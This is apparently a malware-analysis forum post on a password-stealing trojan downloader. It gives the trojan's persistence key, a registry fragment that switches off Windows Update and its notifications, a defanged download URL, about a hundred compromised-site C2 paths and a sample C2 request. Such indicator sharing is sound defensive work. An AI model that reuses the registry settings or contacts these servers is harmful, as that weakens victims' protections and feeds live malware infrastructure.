loader.exe is trojan downloader with PWS stuff on board (facebook, myspace related).
while working it copies itself to windows directory, executes this
starts through
HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run
REGEDIT4
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\WindowsUpdate\Auto Update]
"AUOptions"=dword:00000001
"NoAutoUpdate"=dword:00000001
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer]
"NoAutoUpdate"=dword:00000001
"NoWindowsUpdate"=dword:00000001
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Security Center]
"UpdatesDisableNotify"=dword:00000001
Spawns copy of IE with remote thread inside.
Downloads "hxxp://newmillsftw.org/.k1ob60/?getexe=bitly.exe"
http://www.virustotal.com/file-scan/rep ... 1293601759
without packer static detection extremely fails
https://www.virustotal.com/file-scan/re ... 1293601767
Full list of malicious servers found inside
www.vasanthkumar.com/.kacx4p/
bollylady.com/.zeh0n/
greenbuddylandscaping.com/.6kts7d/
xrysanthema.gr/.s3kdzis/
prosysjo.net/.7d9j3/
joshuaimpex.com/.zn8rv8/
dngmekanik.com/.u6ww/
autobodynb.ca/.9il35/
tavalodidigar.com/.kgvq/
thedunesinc.com/.fp3hxvj/
direcconnect.org/.2ut8e/
tuffreemusic.com/.pvr628/
ornellagallo.com/.98bb/
1000bonus.com/.ihqkyx/
programs.ppbsa.org/.qtig80p/
feuerwehr-zermatt.ch/.rp46x/
neon21.it/.sja82dg/
shirleymancino.com/.pim1/
josecure.com/.lowvs/
031aec9.netsolhost.com/.1yty3f6/
frauenbekleidung.net/.3frgkh8/
http://www.steelstoneind.com/.8rl96e/
gite-maison-pyrenees-luchon.com/.ryj3h/
polistena.net/.buku/
http://www.wizzelheadclub.com/.5hok/
kadinhani.meb.gov.tr/.onrso9z/
twtsappolimer.com/.8jajgo/
libermann.phpnet.org/.7qswhr/
pplanet.cafe24.com/.9xh6uy6/
http://www.18yearsold.name/.v74ympz/
analyseco.com/.a0h8av/
mdcoc.net/.n85ki/
911storeusa.com/.l915x86/
pixels-prod.com/.2gv18/
jamesclavin.com/.13qwp1/
lsante.com/.cl540vx/
dengemuhendislik.com.tr/.owuc1/
http://www.chilternsteading.com/.5gngkh/
goldmaniac.com/.6jd67j/
http://www.fotothor.be/.32bdsk/
callmeasset.com/.l4ocgn/
sunudaroumousty.com/.epe9/
http://www.richmondancestry.org/.fyeun/
foodsafe.gr/.b25bids/
doctorsorchestra.com/.nk5yj/
efinsaat.com.tr/.kbklsv/
mariosanchez.nl/.sckwkk/
http://www.amirlotan.com/.xlrmbu/
tarryl.com/.nue1/
healthmann.pk/.8oyh/
mark.nwicc.us/.b105sza/
erleliivak.com/.31e6e/
ekerfen.com/.rwmma/
newmillsftw.org/.k1ob60/
basharss.net/.z51s4/
http://www.bethlehemautosales.com/.thcvo/
irisjard.o2switch.net/.2u72z8/
prostruction.net/.r08704/
http://www.kaleto.com.ar/.fmn28bh/
techmastersofct.com/.ako9pnt/
forwardmarchministries.org/.g0nt1/
altered-images.co.uk/.qonf/
http://www.charlys-hundestudio.de/.eqb9q/
shreyaengineering.in/.qm8e2/
vaillanturunleri.com/.ba28bim/
196.27.0.5/.c2cwk8/
http://www.bradrichmond.com/.k4dlp/
roomservicedesign.com.au/.mvo2w/
prellerstay.co.za/.mkaty/
radiosrt.com/.ya8kwk/
kombiklimaonline.com/.v5tby/
dimensionti.com/.7sa8sk/
devonhols.co.uk/.9gett13/
http://www.joefurlong.com/.wpuiz/
estorm.ch/.f1mgz/
http://www.diamatrixdemo.co.za/.ybbgx8/
vyborny-immo.com/.qahno/
sgtbcollege.org/.m4rpb7d/
odtugv.org.tr/.cdws4/
naturalherbalsinc.com/.bk9p/
hulasa.com/.z1aox/
keeplan.com/.11e6j7z/
http://www.deadlyserious.co.uk/.kty0f7/
pilatescenter.se/.kabf/
bridgepointfiles.org/.bnrr/
whsbands.org/.cuqwv/
http://www.blowmeupbig.com/.iunb8/
http://www.drive4faf.com/.5jdz8lh/
pcmart.es/.8cg073c/
mahjongmuseum.com/.oieq/
sessions.lilangelsphotographs.com/.9919eh/
emsenergy.co.uk/.rs7s6hw/
shannondreamlabradors.de/.1utyqm/
auto-mann.ca/.2dmdze/
bigcountryna.org/.bzp6e/
madheadsmovement.de/.jfqa6ec/
kennethom.net/.8jgz/
http://www.redeemerwinchester.net/.1h9jc/
prodep.ir/.i5w1/
etmix.com/.lz77saj/
asjjqygu21d2trdh2.com
Example of request
GET /.lz77saj/?action=bitly&v=2&a=get HTTP/1.0. Host: etmix.com User-Agent: Mozilla/5.01 (Windows; U; Windows NT 5.2; ru; rv:1.9.0.1) Gecko/20050104 Firefox/3.0.2 Connection:close
From the same server I managed to get another dropper zup32.exe, if you know any other names you can probably harvest more
See attach